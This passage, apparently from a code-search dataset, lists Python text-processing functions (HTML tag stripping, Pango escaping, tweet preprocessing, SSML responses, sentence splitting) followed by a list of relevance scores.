context == \"comment_tag\":\n # End of a comment\n # Throw this away (for now)\n context = \"none\"\n buff = \"\"\n else:\n # Nothing special about this\n # Add to the output\n out_text = out_text + escape_xml_characters(c)\n # Finished - append the remaining buffer\n out_text = out_text + escape_xml_characters(buff)\n return remove_blank_lines(out_text)", "def text_to_pango(self):\n def replace(text):\n components = text.split(\"&\")\n out = components[0]\n for item in components[1:]:\n if item.startswith(\"amp;\") \\\n or (not item.startswith(\"amp;\")\n and html.unescape(f'&{item}') != f'&{item}'):\n out += \"&\" + item\n else:\n out += \"&amp;\" + item\n return out\n\n if \"full_text\" in self.output.keys():\n self.output[\"full_text\"] = replace(self.output[\"full_text\"])\n if \"short_text\" in self.output.keys():\n self.output[\"short_text\"] = replace(self.output[\"short_text\"])", "def preprocess_ST_message(text):\n # Define ST Regex Patters\n REGEX_PRICE_SIGN = re.compile(r'\\$(?!\\d*\\.?\\d+%)\\d*\\.?\\d+|(?!\\d*\\.?\\d+%)\\d*\\.?\\d+\\$')\n REGEX_PRICE_NOSIGN = re.compile(r'(?!\\d*\\.?\\d+%)(?!\\d*\\.?\\d+k)\\d*\\.?\\d+')\n REGEX_TICKER = re.compile('\\$[a-zA-Z]+')\n REGEX_USER = re.compile('\\@\\w+')\n REGEX_LINK = re.compile('https?:\\/\\/[^\\s]+')\n REGEX_HTML_ENTITY = re.compile('\\&\\w+')\n REGEX_NON_ACSII = re.compile('[^\\x00-\\x7f]')\n REGEX_PUNCTUATION = re.compile('[%s]' % re.escape(string.punctuation.replace('<', '')).replace('>', ''))\n REGEX_NUMBER = re.compile(r'[-+]?[0-9]+')\n\n text = text.lower()\n\n # Replace ST \"entitites\" with a unique token\n text = re.sub(REGEX_TICKER, ' <TICKER> ', text)\n text = re.sub(REGEX_USER, ' <USER> ', text)\n text = re.sub(REGEX_LINK, ' <LINK> ', text)\n text = re.sub(REGEX_PRICE_SIGN, ' <PRICE> ', text)\n text = re.sub(REGEX_PRICE_NOSIGN, ' <NUMBER> ', text)\n text = re.sub(REGEX_NUMBER, ' <NUMBER> ', text)\n # Remove extraneous text data\n text = re.sub(REGEX_HTML_ENTITY, \"\", text)\n text = re.sub(REGEX_NON_ACSII, \"\", text)\n text = re.sub(REGEX_PUNCTUATION, \"\", text)\n # Tokenize and remove < and > that are not in special tokens\n words = \" \".join(token.replace(\"<\", \"\").replace(\">\", \"\")\n if token not in ['<TICKER>', '<USER>', '<LINK>', '<PRICE>', '<NUMBER>']\n else token\n for token\n in text.split())\n\n return words", "def normalize_with_audio(self, text: str, verbose: bool = False) -> str:\n text = text.strip()\n if not text:\n if verbose:\n print(text)\n return text\n text = pynini.escape(text)\n\n def get_tagged_texts(text):\n tagged_lattice = self.find_tags(text)\n tagged_texts = self.select_all_semiotic_tags(tagged_lattice)\n return tagged_texts\n\n tagged_texts = set(get_tagged_texts(text))\n normalized_texts = []\n\n for tagged_text in tagged_texts:\n self.parser(tagged_text)\n tokens = self.parser.parse()\n tags_reordered = self.generate_permutations(tokens)\n for tagged_text_reordered in tags_reordered:\n tagged_text_reordered = pynini.escape(tagged_text_reordered)\n\n verbalizer_lattice = self.find_verbalizer(tagged_text_reordered)\n if verbalizer_lattice.num_states() == 0:\n continue\n\n verbalized = self.get_all_verbalizers(verbalizer_lattice)\n for verbalized_option in verbalized:\n normalized_texts.append(verbalized_option)\n\n if len(normalized_texts) == 0:\n raise ValueError()\n\n normalized_texts = [post_process(t) for t in normalized_texts]\n normalized_texts = set(normalized_texts)\n return normalized_texts", "def RemoveHTMLTags(data):\n\n p = re.compile(r'<[^<]*?>')\n return p.sub('', 
data)", "def remove_html(x: str) -> str:\n regex = r\"<.+?>\"\n return re.sub(regex, \"\", x)", "def speech_response_ssml(output, endsession):\n return {\n 'outputSpeech': {\n 'type': 'SSML',\n 'ssml': \"<speak>\" +output +\"</speak>\" \n },\n 'shouldEndSession': endsession\n }", "def preprocess(text):\r\n\r\n #Regex to remove URL and @ symbol\r\n regex = '@\\S*|http\\S*|www\\S*'\r\n preprocessed_text = re.sub(regex, '', text)\r\n preprocessed_text = deEmojify(preprocessed_text)\r\n preprocessed_text = strip_html(preprocessed_text)\r\n\r\n return preprocessed_text", "def convert_content(self, html):\n\n try:\n dom = BeautifulSoup(html, 'html.parser')\n return self.parse_content(dom)\n except:\n return html", "def make_silence_phones_txt(self):\n raise NotImplementedError", "def remove_tags(text):\n\n global cleanr\n global cleann\n global cleans\n try:\n text = BeautifulSoup(text)\n for table in text.findAll(\"table\"):\n table.extract()\n text = text.text\n text = re.sub(cleanr, '', text)\n text = re.sub(cleann, '', text)\n text = re.sub(cleans, ' ', text)\n\n except Exception as e:\n pass\n\n return text", "def clean_html(text):\n cleanr = re.compile(\"<.*?>\")\n clean_text = re.sub(cleanr, \"\", text)\n return clean_text", "def clean(text, replies=False, hashtags=False, rts=False, urls=False):\n text = text.replace('\\n', ' ')\n text = text.replace('\\r', ' ')\n text = html.unescape(text)\n if rts:\n text = regex_rts.sub('', text)\n if replies:\n text = regex_replies.sub('', text)\n if hashtags:\n text = regex_hashtags.sub('', text)\n if urls:\n text = regex_urls.sub('', text)\n text = regex_whitespace.sub(' ', text)\n text = text.strip()\n return text", "def parse_text(self, text):\r\n MAXLEN = 100\r\n sentences = []\r\n punct = [\",\",\":\",\";\",\".\",\"–\",\"?\",\"!\",\"(\",\")\"] # Interpunctuation marks\r\n text = text.replace(\"\\r\", \" \").replace(\"\\t\", \" \") # Remove CR and tabs\r\n words = text.split(\" \") if len(text) > MAXLEN else []\r\n sentence = \"\" if len(text) > MAXLEN else text\r\n\r\n # Preprocess list for silence markers\r\n if conf.SilenceMarker in text:\r\n words_new = []\r\n if not words and sentence: # Was too short to be cut initially\r\n words = text.split(\" \")\r\n sentence = \"\"\r\n for w in filter(None, words):\r\n if conf.SilenceMarker not in w.lower():\r\n words_new.append(w)\r\n else:\r\n text_chunks = w.lower().split(conf.SilenceMarker)\r\n for i, part in enumerate(text_chunks):\r\n if part:\r\n words_new.append(part)\r\n if i < len(text_chunks) - 1:\r\n words_new.append(conf.SilenceMarker)\r\n else:\r\n if words_new and conf.SilenceMarker in words_new[-1]:\r\n words_new[-1] += conf.SilenceMarker\r\n else:\r\n words_new.append(conf.SilenceMarker)\r\n words = words_new\r\n\r\n for w in words:\r\n if conf.SilenceMarker in w:\r\n if sentence:\r\n sentences.append(sentence.strip())\r\n sentences.append(w)\r\n sentence = \"\"\r\n elif w[-1] in punct or w[0] in punct: # Encountered punctuation\r\n if w[-1] in punct and (len(sentence) + len(w) + 1 < MAXLEN):\r\n # Word ends with punct and sentence can still be added to\r\n sentences.append(sentence.strip() + \" \" + w.strip())\r\n sentence = \"\" # Save sentence and word, start new sentence\r\n elif w[0] in punct and w[-1] not in punct:\r\n # Word starts with punctuation, like '('\r\n sentences.append(sentence.strip()) # Save current sentence\r\n sentence = w # Start a new sentence with punct and word\r\n else: # word ends with punct and sentence already long enough\r\n 
sentences.extend([sentence.strip(), w.strip()])\r\n sentence = \"\" \r\n else:\r\n if (len(sentence) + len(w) + 1 < MAXLEN): # Sentence still\r\n sentence += \" \" + w # short enough\r\n else: # Sentence too long\r\n sentences.append(sentence.strip())\r\n sentence = w # Start a new sentence with the word\r\n if sentence:\r\n sentences.append(sentence.strip())\r\n return sentences", "def _get_text(raw_html):\n bs = BeautifulSoup(raw_html)\n text_nodes = bs.find_all(_is_text_tag)\n text_elements = [_get_child_text(node) for node in text_nodes]\n return ' '.join(chain(*chain(*text_elements)))", "def txt(input):\n output=atpic.cleaner_alex.txtclean(input)\n return output" ]
[ "0.74603456", "0.71631587", "0.63201004", "0.6288619", "0.6236227", "0.6161472", "0.6157704", "0.61351144", "0.6124986", "0.6062542", "0.6052379", "0.5990713", "0.5988849", "0.59758717", "0.5871905", "0.5855006", "0.5835654", "0.58335525", "0.58257437", "0.5820562", "0.57998407", "0.5776051", "0.5769966", "0.5767022", "0.5760792", "0.57532287", "0.5735325", "0.57270354", "0.5726879", "0.5696022", "0.5681448", "0.56777686", "0.5666513", "0.566427", "0.56526744", "0.56446546", "0.56354785", "0.56271464", "0.56146824", "0.5593406", "0.5593214", "0.5587791", "0.5587791", "0.5580561", "0.55752707", "0.5571537", "0.55710036", "0.55595475", "0.55522406", "0.5548131", "0.5531441", "0.5512631", "0.5503497", "0.54863846", "0.5485271", "0.5483645", "0.5483173", "0.5483173", "0.54728067", "0.546504", "0.54571414", "0.5456701", "0.54487026", "0.54370314", "0.5435246", "0.5435246", "0.54195726", "0.54157835", "0.54145515", "0.54045564", "0.5398233", "0.53979796", "0.53978854", "0.5396904", "0.5382863", "0.53782856", "0.5371862", "0.53600395", "0.5349436", "0.53467345", "0.53281915", "0.5307609", "0.53060275", "0.5305588", "0.5297783", "0.52859074", "0.52728087", "0.52643454", "0.5264068", "0.5235683", "0.52142006", "0.5213487", "0.52048683", "0.5194118", "0.51729894", "0.51698965", "0.51697975" ]
0.7831128
3
Add a card by translating ssml text to card content.
def add_card(handler_input, response): # type: (HandlerInput, Response) -> None response.card = SimpleCard( title=skill_name, content=convert_speech_to_text(response.output_speech.ssml))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def addContent(text):", "def createTextCard(self, x, z):\n self.myText = TextNode('scrollValue')\n funcs.setZeroToText(self.myText, self.designsLeft)\n self.enableSubmit()\n self.myText.setFont(self.font)\n self.myText.setCardColor(globals.colors['guiblue3'])\n self.myText.setFrameColor(globals.colors['guiblue2'])\n self.myText.setFrameAsMargin(0, 0, 0, 0)\n self.myText.setFrameLineWidth(3)\n self.myText.setCardAsMargin(.1, .1, .1, .1)\n textNodePath = aspect2d.attachNewNode(self.myText)\n textNodePath.setScale(0.09)\n textNodePath.setPos(x, 0, z)\n self.myWidgets.append(textNodePath)", "def add_card(handler_input, response):\n # type: (HandlerInput, Response) -> None\n if response.card:\n return\n response.card = ui.SimpleCard(\n title='Daily Dungeon',\n content=convert_speech_to_text(response.output_speech.ssml)\n )", "def add_card(self, card_widget: WidgetT):", "def add_card(self, card):\n self.cards.append(card)", "def add_card(self, card):\n self.cards.append(card)", "def add_card(self, card):\n self.cards.append(card)", "def add_card(self, card):\n self.cards.append(card)", "def add_text(self, text):\n text_template = self.templateEnv.get_template(f'{ReportGenerator.COMPONENTS_FOLDER}/text.html')\n text_output = text_template.render(text=text)\n self.contents.append(text_output)", "def addCard(self,card:Card):\r\n self.cards.append(card)", "def add_card(self, card):\n self.get_cards().append(card)", "def create_card(cls, card_title, card_content, content_id, css_class=\"card-text\"):\n card = dbc.Card(\n dbc.CardBody(\n [\n html.H5(card_title, className=\"card-title\"),\n html.P(card_content, className=css_class, id=content_id),\n ],\n className=css_class,\n )\n )\n return card", "def createTitleCard2(self, name, text, wordwrap, x, z, scale=0.025):\n self.myTitle2 = TextNode(name)\n self.myTitle2.setFont(self.font)\n self.myTitle2.setText(text)\n self.myTitle2.setWordwrap(wordwrap)\n self.myTitle2.setTextColor(globals.colors['guiwhite'])\n self.myTitle2.setCardColor(globals.colors['guiblue3'])\n self.myTitle2.setFrameColor(globals.colors['guiblue2'])\n self.myTitle2.setFrameAsMargin(.3, .5, .5, .5)\n self.myTitle2.setFrameLineWidth(3)\n self.myTitle2.setCardAsMargin(.3, .5, .5, .5)\n textNodePath = aspect2d.attachNewNode(self.myTitle2)\n textNodePath.setScale(scale)\n textNodePath.setPos(x, 0, z)\n self.myWidgets.append(textNodePath)", "def createTextCard2(self, x, z):\n self.myText2 = TextNode('scrollValue2')\n funcs.setZeroToText(self.myText2, self.simulationsLeft)\n self.enableSubmit()\n self.myText2.setFont(self.font)\n self.myText2.setCardColor(globals.colors['guiblue3'])\n self.myText2.setFrameColor(globals.colors['guiblue2'])\n self.myText2.setFrameAsMargin(0, 0, 0, 0)\n self.myText2.setFrameLineWidth(3)\n self.myText2.setCardAsMargin(.1, .1, .1, .1)\n textNodePath = aspect2d.attachNewNode(self.myText2)\n textNodePath.setScale(0.09)\n textNodePath.setPos(x, 0, z)\n self.myWidgets.append(textNodePath)", "def add_card(self, card):\n \n self._hand.add_first(card)", "def add_card(self, card):\n self.deckcards.append(card)", "def add(self, cards):\n\n super().add(cards)\n self._update_value()", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n scale = double(card, 3, 'scale')\n N = [double_or_blank(card, 4, 'N1', 0.0),\n double_or_blank(card, 5, 'N2', 0.0),\n double_or_blank(card, 6, 'N3', 0.0)]\n\n nodes = fields(integer_or_string, card, 'node', i=9, j=len(card))\n return ACCEL1(sid, scale, N, nodes, cid=cid, 
comment=comment)", "def add_card(self, card):\n self.decklist.append(card)", "def register(self):\n with open(self.file) as xml:\n self.text = Text(urn=self.name, resource=xml)", "def add_text(self, text: str) -> None:\n self.texts.append(text.strip().rstrip(\"\\n\"))", "def massage_addcontent(self) -> str:\n pass", "def add_card(self, card):\r\n self.hand.append(card)", "def add(self, card):\n if card != None:\n self.cards.append(card)", "def set_card_simple(self, title, content):\n self.response.card.type = 'Simple'\n self.response.card.title = title\n self.response.card.content = content", "def add(self, name, content):\n raise NotImplementedError", "def add_card(update, context):\n query = update.callback_query\n if query.message.reply_to_message:\n user = query.message.reply_to_message.from_user\n else:\n user = query.message.chat\n bot = context.bot\n CURRENT_CONTEXT = USERS[user.username]\n message = f'Round: {CURRENT_CONTEXT[\"round\"]} ({CURRENT_CONTEXT[\"username\"]}) \\nDealers Card: {CURRENT_CONTEXT[\"dealer_card\"]}\\nYour Cards: {CURRENT_CONTEXT[\"player_cards\"]} \\nYour total: {CURRENT_CONTEXT[\"player_total\"]} \\n\\n You {query.data}! New card?'\n bot.edit_message_text(\n chat_id=query.message.chat_id,\n message_id=query.message.message_id,\n text=message,\n reply_markup=card_markup\n )\n\n return ADD_CARD", "def createCard(self,id,name):\n card = Card(id,name)\n self.cards[id] = card\n print('Created Card:'+id)", "def add_card(self, card):\n self.hand.append(card)", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n mag = double(card, 3, 'mag')\n g1 = integer(card, 4, 'g1')\n g2 = integer(card, 5, 'g2')\n g3 = integer(card, 6, 'g3')\n g4 = integer(card, 7, 'g4')\n assert len(card) == 8, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, g1, g2, g3, g4, comment=comment)", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n mag = double(card, 3, 'mag')\n g1 = integer(card, 4, 'g1')\n g2 = integer(card, 5, 'g2')\n assert len(card) == 6, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, g1, g2, comment=comment)", "def add_text(self, text):\n self.text = self.text + text", "def add_text(self, text: str, lang: str):\n self.add_relationship(\n Nampi_type.Core.has_text, self._graph.string_literal(text, lang)\n )", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n node = integer(card, 2, 'node')\n cid = integer_or_blank(card, 3, 'cid', 0)\n mag = double(card, 4, 'mag')\n xyz = array([double_or_blank(card, 5, 'X1', 0.0),\n double_or_blank(card, 6, 'X2', 0.0),\n double_or_blank(card, 7, 'X3', 0.0)])\n assert len(card) <= 8, 'len(%s card) = %i\\ncard=%s' % (cls.type, len(card), card)\n return cls(sid, node, mag, xyz, cid=cid, comment=comment)", "def add_card(self, card):\n list_query = self.session.query(List).filter_by(id=card.list_id)\n cardlist = list_query.one()\n # TODO(errorhandling): if list does not exists then it should throw an exception\n\n card_query = self.session.query(Card).filter_by(\n list_id=cardlist.id,\n translation_id=card.translation_id)\n\n try:\n db_card = card_query.one()\n except NoResultFound:\n db_card = Card(\n translation_id=card.translation_id,\n list_id=cardlist.id\n )\n\n self.session.add(db_card)\n self.session.commit()\n\n return card", "def add_card(self, card):\n self.cards.append(card)\n self.sum_hand(self.cards)", "def add_card(cls, card, 
comment=''):\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n p1 = double_or_blank(card, 3, 'p1', 0.0)\n pressures = [\n p1,\n double_or_blank(card, 4, 'p2'),\n double_or_blank(card, 5, 'p3'),\n double_or_blank(card, 6, 'p4')]\n\n eids = [eid]\n g1_thru = integer_string_or_blank(card, 7, 'g1/THRU')\n if g1_thru == 'THRU' and integer_or_blank(card, 8, 'eid2'):\n # alternate form\n eid2 = integer(card, 8, 'eid2')\n if eid2:\n eids = list(unique(\n expand_thru([eid, 'THRU', eid2], set_fields=False, sort_fields=False)\n ))\n g1 = None\n g34 = None\n else:\n # standard form\n eids = [eid]\n g1 = integer_or_blank(card, 7, 'g1')\n g34 = integer_or_blank(card, 8, 'g34')\n\n # If both (CID, N1, n2, N3) and LDIR are blank, then the default is\n # LDIR=NORM.\n cid = integer_or_blank(card, 9, 'cid')\n n1 = double_or_blank(card, 10, 'N1', 0.)\n n2 = double_or_blank(card, 11, 'N2', 0.)\n n3 = double_or_blank(card, 12, 'N3', 0.)\n nvector = array([n1, n2, n3])\n\n surf_or_line = string_or_blank(card, 13, 'sorl', 'SURF')\n line_load_dir = string_or_blank(card, 14, 'ldir', 'NORM')\n assert len(card) <= 15, f'len(PLOAD4 card) = {len(card):d}\\ncard={card}'\n return PLOAD4(sid, eids, pressures, g1, g34, cid, nvector,\n surf_or_line, line_load_dir, comment=comment)", "def add_card(self, card):\n self.unpack_cards()\n card.dealt(self)\n self.card_list.append(card)\n self.num_cards.set(self.num_cards.get()+1)\n # pretty inefficient to unpack and pack on every card addition...\n self.pack_cards() \n if self.empty.get() is True:\n self.empty.set(False)\n self.toggle_empty_hand()", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n eid = integer(card, 2, 'eid')\n load_type = string(card, 3, 'Type (\"%s\")' % '\", \"'.join(cls.valid_types))\n scale = string(card, 4, 'scale (\"%s\")' % '\", \"'.join(cls.valid_scales))\n x1 = double(card, 5, 'x1')\n p1 = double(card, 6, 'p1')\n x2 = double_or_blank(card, 7, 'x2', x1)\n p2 = double_or_blank(card, 8, 'p2', p1)\n assert len(card) <= 9, f'len(PLOAD1 card) = {len(card):d}\\ncard={card}'\n return PLOAD1(sid, eid, load_type, scale, x1, p1, x2, p2, comment=comment)", "def add_card(self, card):\r\n\t\tself.cards.append(card)\r\n\t\tself.__update_values()\r\n\t\tself.__update_valid_moves()", "def display_eng_word():\n en_word = rand_word[\"English\"] # Grabs the English word of the current word\n canvas.itemconfig(card_title, text=\"English\", fill=\"white\") # Change screen title to English\n canvas.itemconfig(card_word, text=en_word, fill=\"white\") # Display the english word of the current displaying french word\n canvas.itemconfig(canvas_image, image=back_image) # Changes the background", "def add_card(self, card):\n \n self.hand.append(card)\n \n return None", "def asm(self, text):\n self.text.append(text)", "def add_card(cls, card, comment=''):\n eid = integer(card, 1, 'eid')\n pid = integer_or_blank(card, 2, 'pid', eid)\n ga = integer(card, 3, 'ga')\n gb = integer(card, 4, 'gb')\n x1_g0 = integer_double_or_blank(card, 5, 'x1_g0', 0.0)\n if isinstance(x1_g0, integer_types):\n g0 = x1_g0\n x = None\n elif isinstance(x1_g0, float):\n g0 = None\n x = np.array([double_or_blank(card, 5, 'x1', 0.0),\n double_or_blank(card, 6, 'x2', 0.0),\n double_or_blank(card, 7, 'x3', 0.0)], dtype='float64')\n if norm(x) == 0.0:\n msg = 'G0 vector defining plane 1 is not defined.\\n'\n msg += 'G0 = %s\\n' % g0\n msg += 'X = %s\\n' % x\n raise RuntimeError(msg)\n else:\n raise ValueError('invalid x1Go=%r on CBEND' % x1_g0)\n geom = integer(card, 8, 
'geom')\n\n assert len(card) == 9, f'len(CBEND card) = {len(card):d}\\ncard={card}'\n return CBEND(eid, pid, [ga, gb], g0, x, geom, comment=comment)", "def define_content(self, html):\n self.html_template(html, lang=\"en\")\n self.add_language(\"en\")", "def addData(self,content):\n\tself.characters(content)", "def add_card(self, added_cards):\n\n self.hand[:0] = added_cards", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n pressure = double(card, 2, 'pressure')\n nodes = [integer(card, 3, 'n1'),\n integer(card, 4, 'n2'),\n integer(card, 5, 'n3')]\n n4 = integer_or_blank(card, 6, 'n4', 0)\n if n4:\n nodes.append(n4)\n assert len(card) <= 7, f'len(PLOAD card) = {len(card):d}\\ncard={card}'\n return PLOAD(sid, pressure, nodes, comment=comment)", "def add_cards(self, cards):\n self.get_cards().extend(cards)", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n scale = double(card, 3, 'scale')\n N = array([double_or_blank(card, 4, 'N1', 0.0),\n double_or_blank(card, 5, 'N2', 0.0),\n double_or_blank(card, 6, 'N3', 0.0)])\n mb = integer_or_blank(card, 7, 'mb', 0)\n assert len(card) <= 8, f'len(GRAV card) = {len(card):d}\\ncard={card}'\n return GRAV(sid, scale, N, cid=cid, mb=mb, comment=comment)", "def Add_Text( self, th ):\r\n self.text_handle = th", "def add(self, text, account=None, images=()):\n # type: (Text, Text, Tuple[Union[cgtwq.model.ImageInfo, Text,], ...]) -> ...\n\n account = account or get_account_id(self.select.token)\n\n # TODO: Refactor arguments at next major version.\n message = Message.load(text)\n message.images += images\n\n text_key = \"dom_text\"\n id_key = \"#link_id\"\n from_account_id_key = \"from_account_id\"\n if compat.api_level() == compat.API_LEVEL_5_2:\n text_key = \"text\"\n id_key = \"#task_id\"\n from_account_id_key = \"#from_account_id\"\n\n select = self.select\n select.call(\n \"c_note\",\n \"create\",\n field_data_array={\n \"module\": select.module.name,\n \"module_type\": select.module.module_type,\n id_key: \",\".join(select),\n text_key: message.api_payload(),\n from_account_id_key: account,\n },\n )", "async def translate(self, ctx: commands.Context, *, text: str):\n # Check for cooldown\n await self.check_cooldown(ctx)\n\n # Create new translation context and contact API\n context = contexts.create_translation_context(self.bot.config.data_path, text=text)\n async with ctx.typing():\n result = await utils.create_completion_result_from_context(self.bot.loop, context)\n await ctx.send(\"```\"+result[:1993]+\"```\")", "def post(self):\n schema = TextSchema()\n text = schema.load(request.json)\n\n if not self.is_english(text.content):\n return {'msg': 'Please provide text in english language'}, 403\n\n db.session.add(text)\n\n try:\n db.session.commit()\n except exc.IntegrityError:\n return {'msg': 'duplicate entries'}, 403\n\n return {'msg': 'text created', 'text': schema.dump(text)}, 201", "def append(self, card):\n self.cards.append(card)", "def addText(self, *__args): # real signature unknown; restored from __doc__ with multiple overloads\r\n pass", "def add_chapter(self, text: str) -> None:\n\n tag = r'\\chapter{%s}' % (text)\n self.doc = self.doc + tag", "def addPublication():\n preloaded = [\n {\"description\": \"bortaS <b>bIr</b> jablu'DI' reH QaQqu' nay'!\"},\n {\"language\": \"en\"},\n {\"country\": \"usa\"}\n ]\n return render_template(\"addPublication.html\", msg=\"\", preloaded=preloaded)", "def handle_data(self, text):\n self.pieces.append(text)", "def 
add_content(self, addition):\n self.content = self.content + addition", "def add_text(self, text, doc=None):\n if doc is None:\n doc = self.doc\n\n attributes = dict(height=13, width=800, align=None,\n style={'width': '800px',\n 'font-size': '100%',\n 'font-style': 'italic',\n 'font-weight': 'lighter',\n 'color': 'darkgrey',\n 'text-align': 'center'})\n doc.add_root(Div(text=f\"<b>{text}</b>\", **attributes))\n return doc", "def add_content(self, content):\n self._content = '{}{}'.format(self._content, content)", "def add_card(cls, card, comment: str=''):\n sid = integer(card, 1, 'sid')\n pressure = double(card, 2, 'p')\n\n if integer_string_or_blank(card, 4, 'THRU') == 'THRU':\n e1 = integer(card, 3, 'Element1')\n e2 = integer(card, 5, 'Element1')\n eids = [i for i in range(e1, e2 + 1)]\n assert len(card) == 6, f'len(PLOAD2 card) = {len(card):d}\\ncard={card}'\n else:\n eids = fields(integer, card, 'eid', i=3, j=len(card))\n assert len(eids) <= 6, f'A maximum of 6 eids may be on the PLOAD2; n={len(eids)}\\ncard={card}'\n return PLOAD2(sid, pressure, eids, comment=comment)", "def add_card(cls, card, comment=''):\n eid = integer(card, 1, 'eid')\n pid = integer_or_blank(card, 2, 'pid', eid)\n ga = integer(card, 3, 'ga')\n gb = integer(card, 4, 'gb')\n gc = integer_or_blank(card, 5, 'gc')\n\n # card, eid, x1_default, x2_default, x3_default\n x, g0 = init_x_g0_cbeam3(card, eid, 0., 0., 0.)\n wa = np.array([double_or_blank(card, 9, 'w1a', 0.0),\n double_or_blank(card, 10, 'w2a', 0.0),\n double_or_blank(card, 11, 'w3a', 0.0)], dtype='float64')\n\n wb = np.array([double_or_blank(card, 12, 'w1b', 0.0),\n double_or_blank(card, 13, 'w2b', 0.0),\n double_or_blank(card, 14, 'w3b', 0.0)], dtype='float64')\n\n wc = np.array([double_or_blank(card, 15, 'w1c', 0.0),\n double_or_blank(card, 16, 'w2c', 0.0),\n double_or_blank(card, 17, 'w3c', 0.0)], dtype='float64')\n\n tw = np.array([double_or_blank(card, 18, 'twa', 0.),\n double_or_blank(card, 19, 'twb', 0.),\n double_or_blank(card, 20, 'twc', 0.)], dtype='float64')\n\n # TODO: what are the defaults?\n s = np.array([integer_or_blank(card, 21, 'sa', -1),\n integer_or_blank(card, 22, 'sb', -1),\n integer_or_blank(card, 23, 'sc', -1)], dtype='int32')\n assert len(card) <= 24, f'len(CBEAM3 card) = {len(card):d}\\ncard={card}'\n return CBEAM3(eid, pid, [ga, gb, gc], x, g0,\n wa=wa, wb=wb, wc=wc, tw=tw, s=s, comment=comment)", "def set_description(self, text, lang=0):\n self.localized_strings[lang] = text", "def add_text(parent, text, transform='', text_height=12, color='#000000'):\n text_style = {'font-size': '%dpx' % text_height, 'font-style': 'normal', 'font-weight': 'normal',\n 'fill': color, 'font-family': 'Bitstream Vera Sans,sans-serif',\n 'text-anchor': 'middle', 'text-align': 'center'}\n\n text_attribs = {\n inkex.addNS('label', 'inkscape'): 'Annotation',\n 'style': simplestyle.formatStyle(text_style)\n }\n if transform != \"translate(0,0)\":\n text_attribs['transform'] = transform\n text_node = inkex.etree.SubElement(parent, inkex.addNS('text', 'svg'), text_attribs)\n text_node.text = text", "def process_text(self, text, language):", "def add_card(cls, card, comment=''):\n sid = integer(card, 1, 'sid')\n cid = integer_or_blank(card, 2, 'cid', 0)\n N = [double_or_blank(card, 3, 'N1', 0.0),\n double_or_blank(card, 4, 'N2', 0.0),\n double_or_blank(card, 5, 'N3', 0.0)]\n direction = string(card, 6, 'dir')\n\n i = 9\n locs = []\n vals = []\n j = 0\n nfields = len(card)\n while i < nfields:\n #raise NotImplementedError('ACCEL-line 2')\n loc = double(card, i, 
'loc%i' % j)\n val = double(card, i, 'loc%i' % j)\n #print('i=%s j=%s len=%s loc=%s val=%s' % (i, j, len(card), loc, val))\n locs.append(loc)\n vals.append(val)\n j += 1\n i += 2\n return ACCEL(sid, N, direction, locs, vals, cid=cid, comment=comment)", "def insert_text(self, text):\n self.str += text", "def add_item(self, text):\n\t\tnew_todo = self.todolist.add(text)\n\t\tself.store.append((new_todo.id, text))", "def insert_new(self, card):\n\n handlers = {\n 'flyer': (self.prepare_flyer, 'card_ordinary'),\n 'test': (self.prepare_proxy('test'), 'card_ordinary'),\n 'once': (self.prepare_proxy('once'), 'card_ordinary'),\n 'abonement': (self.prepare_abonement, 'card_ordinary'),\n }\n slug = card['slug']\n handle, card_type = handlers[slug]\n info = handle(card) # here is a dictionary\n\n card_desc_list = self.static[card_type]\n search_result = filter(lambda a: a['slug'] == slug, card_desc_list)\n if len(search_result) != 1:\n raise Exception('Check card type list')\n this_card = search_result[0]\n\n record = []\n\n for name, delegate, title, action, use_static in MODEL_MAP_RAW:\n value = info.get(name, None)\n if use_static:\n if value and name == 'price_category':\n value = filter(\n lambda a: a['id'] == value,\n this_card['price_categories']\n )[0]\n if value and name == 'discount':\n value = filter(\n lambda a: a['id'] == value,\n self.static['discounts']\n )[0]\n record.append(value)\n record.append(0) # this record is not registered in DB yet\n\n self.storage.insert(0, record)\n self.emit(SIGNAL('rowsInserted(QModelIndex, int, int)'),\n QModelIndex(), 1, 1)", "def trelloAddCard(self, args): \n\n listID = args[\"threadID\"] \n cardName = args[\"message\"] \n\n l = self.getListByID(listID) \n l.append(cardName) # Check this ", "def __init__(self, text: str) -> None:\n\n super().__init__()\n\n self._width = 0\n self._opacity = 255\n self._sprites = []\n self._text = text\n for index, c in enumerate(text):\n y_offset = 0\n if c in Text.characters:\n if Text.characters[c][1]:\n y_offset = 2\n c = Text.characters[c][0]\n elif c.isupper():\n c = c.lower() + \"_maj\"\n self._sprites.append(\n cocos.sprite.Sprite(pyglet.image.load(PATH + '/assets/img/common/font/{0}.png'.format(c))))\n self._sprites[index].position = self._width, (self._sprites[index].height - 11) / 2 - y_offset\n self._width += self._sprites[index].width\n self.add(self._sprites[index])", "def add_text(self, x, y, text):\n elem = TextElement()\n elem.text = str(text)\n elem.style = {\n 'font-size': self.svg.unittouu('10pt'),\n 'fill-opacity': '1.0',\n 'stroke': 'none',\n 'font-weight': 'normal',\n 'font-style': 'normal' }\n elem.update(x=str(x), y=str(y))\n return elem", "def add_card_to_hand(self, card):\n self.hand.append(card)", "def set_content(self, text):\n img, size = self._render_as_image(text)\n # Modify the Drawable attributes based on text attributes\n self.image = img\n self.rect.size = size", "def add_text(text, x, y, rgb = [0, 0, 0], font_name = 'times new roman', size = 32, bold = False, italics = False, merged = False, slot = 0):\r\n \r\n font = pygame.font.SysFont(font_name, size, bold, italics)\r\n text = font.render(text, 1, rgb)\r\n \r\n if slot not in __g.keys():\r\n raise IndexError('No image loaded at slot %i' %(slot))\r\n \r\n surface = __g.values()[slot]\r\n if merged:\r\n surface.image.blit(text, (x, y))\r\n else:\r\n surface.text_add.append([x, y, text])", "def 